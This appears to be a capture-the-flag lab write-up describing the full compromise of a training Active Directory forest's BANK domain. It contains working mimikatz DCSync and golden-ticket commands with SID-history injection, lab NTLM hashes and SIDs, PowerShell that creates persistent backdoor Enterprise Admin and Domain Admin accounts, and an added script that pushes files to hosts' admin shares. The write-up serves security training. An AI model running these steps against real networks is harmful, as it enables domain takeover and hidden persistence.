Full Compromise of BANK Domain
Summary
Using the golden ticket from the previous section, we open a PowerShell session with Administrator privileges via PsExec and create a user with Enterprise Admin rights on ROOTDC.
That access extends to BANKDC, where we create a Domain Admin user in the BANK domain and place our proof of compromise on every reachable machine.
Recon
With PsExec we open a PowerShell session with Administrator privileges.

With the golden ticket in place, we can DCSync the root domain's built-in Administrator account (RID 500), using the SID we obtained in the previous section:
lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500
This returns the Administrator NTLM hash: 5e3d8d541c6d3891c20a503464869fa9
Breaching BANK Domain (10.200.XXX.101)
We craft another golden ticket, this time as krbtgt of the CORP domain, injecting the root domain's Enterprise Admins SID (RID 519) through /sids so the ticket is honoured as an Enterprise Admin across the forest. Note that /sid takes the domain SID itself, without a trailing RID, and /rc4 is the CORP krbtgt NTLM hash:
kerberos::golden /user:krbtgt /domain:corp.thereserve.loc /sid:S-1-5-21-170228521-1485475711-3199862024-1009 /service:krbtgt /rc4:0c757a3445acb94a654554f3ac529ede /sids:S-1-5-21-1255581842-1300659601-3764024703-519 /ptt
To maintain persistence and log in without minting new tickets, we create a new user from the Administrator PowerShell session and add it to the Enterprise Admins group:
$pwd = ConvertTo-SecureString "<password>" -AsPlainText -Force
New-ADUser -Name "<username>" -AccountPassword $pwd -PasswordNeverExpires $true -Enabled $true -Server "rootdc.thereserve.loc"
$User = Get-ADUser -Identity "<username>" -Server "rootdc.thereserve.loc"
$Group = Get-ADGroup -Identity "Enterprise Admins" -Server "rootdc.thereserve.loc"
Add-ADGroupMember -Identity $Group -Members $User -Server "rootdc.thereserve.loc"
Now that we are Enterprise Admins, compromising the other child domain should be straightforward. We start by connecting over RDP from ROOTDC to BANKDC with the newly created user.
We can use the same commands to create a user on CORPDC as a Domain Admin, so that we hold accounts in both child domains. Domain Admins is a global group, so its members must live in the same domain; that is why a separate account is created per child domain instead of reusing the root-domain user:
$pwd = ConvertTo-SecureString "<password>" -AsPlainText -Force
New-ADUser -Name "<username>" -AccountPassword $pwd -PasswordNeverExpires $true -Enabled $true -Server "corpdc.corp.thereserve.loc"
$User = Get-ADUser -Identity "<username>" -Server "corpdc.corp.thereserve.loc"
$Group = Get-ADGroup -Identity "Domain Admins" -Server "corpdc.corp.thereserve.loc"
Add-ADGroupMember -Identity $Group -Members $User -Server "corpdc.corp.thereserve.loc"
Now we repeat the process in the BANK domain, creating a Domain Admin user with the same commands pointed at BANKDC:
$pwd = ConvertTo-SecureString "<password>" -AsPlainText -Force
New-ADUser -Name "<username>" -AccountPassword $pwd -PasswordNeverExpires $true -Enabled $true -Server "bankdc.bank.thereserve.loc"
$User = Get-ADUser -Identity "<username>" -Server "bankdc.bank.thereserve.loc"
$Group = Get-ADGroup -Identity "Domain Admins" -Server "bankdc.bank.thereserve.loc"
Add-ADGroupMember -Identity $Group -Members $User -Server "bankdc.bank.thereserve.loc"
Using the newly created Domain Admin account, we place our proof of compromise on all target machines with the runas command. This avoids an RDP session to each individual machine and streamlines the process considerably.

To avoid re-entering the password for every runas invocation, we run runas once to open a command prompt as bank\<username>, passing cmd.exe /k so the shell stays open. Every copy command then runs from that single session under the Domain Admin token.
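As an added example (not the writeup's own commands), here is the runas line the paragraph describes, followed by a PowerShell function that does the same job with a single credential prompt: it maps each target's C$ admin share with the BANK Domain Admin credential, copies the proof file, confirms it landed, and releases the mapping. The host list and proof path are placeholders constructed for this example; the account is the bank\<username> Domain Admin created above, and SMB (445) is assumed reachable on each target.

```powershell
# Added example, not from the original writeup.
# The interactive one-liner the text describes: one prompt, then a shell that
# keeps the bank\<username> token for every later `copy` command:
#   runas /user:bank\<username> "cmd.exe /k"
#
# The function below is the scripted equivalent: prompt for the credential once,
# then map each target's C$ admin share with it, copy the proof file and confirm.
# Assumptions: SMB (445) reachable, the account is a Domain Admin in BANK,
# and the IP list / proof path are placeholders constructed for this example.

function Publish-Proof {
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,
        [Parameter(Mandatory)][string]$ProofPath,
        [Parameter(Mandatory)][pscredential]$Credential,
        [string]$RemoteDir = 'Users\Administrator\Desktop'
    )
    $leaf = Split-Path -Path $ProofPath -Leaf
    foreach ($computer in $ComputerName) {
        $result = [ordered]@{ Computer = $computer; Placed = $false; Error = $null }
        try {
            # Map \\host\C$ under a temporary drive name with the supplied credential.
            # Copy-Item cannot take -Credential for UNC paths on the FileSystem
            # provider; New-PSDrive can, so the mapping carries the credential.
            New-PSDrive -Name proof -PSProvider FileSystem -Root "\\$computer\C$" `
                -Credential $Credential -ErrorAction Stop | Out-Null
            $dest = Join-Path 'proof:\' $RemoteDir
            Copy-Item -Path $ProofPath -Destination $dest -Force -ErrorAction Stop
            # Confirm the file is readable at the destination before reporting success.
            $result.Placed = Test-Path -Path (Join-Path $dest $leaf)
        } catch {
            $result.Error = $_.Exception.Message
        } finally {
            Remove-PSDrive -Name proof -Force -ErrorAction SilentlyContinue
        }
        [pscustomobject]$result
    }
}

# Constructed placeholders: replace with the real lab subnet and your proof file.
$targets = '10.200.XXX.101', '10.200.XXX.102', '10.200.XXX.103'
$cred    = Get-Credential -UserName 'bank\<username>' -Message 'BANK Domain Admin'
Publish-Proof -ComputerName $targets -ProofPath 'C:\Users\Administrator\proof.txt' -Credential $cred |
    Format-Table -AutoSize
```

Each mapping is a network logon (event 4624, logon type 3) on the target, so expect one such event per host in the defenders' logs; a host that reports Placed = False with an access-denied error is usually one where the account is not in the local Administrators group and the C$ share is therefore unavailable.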
Flags 9-14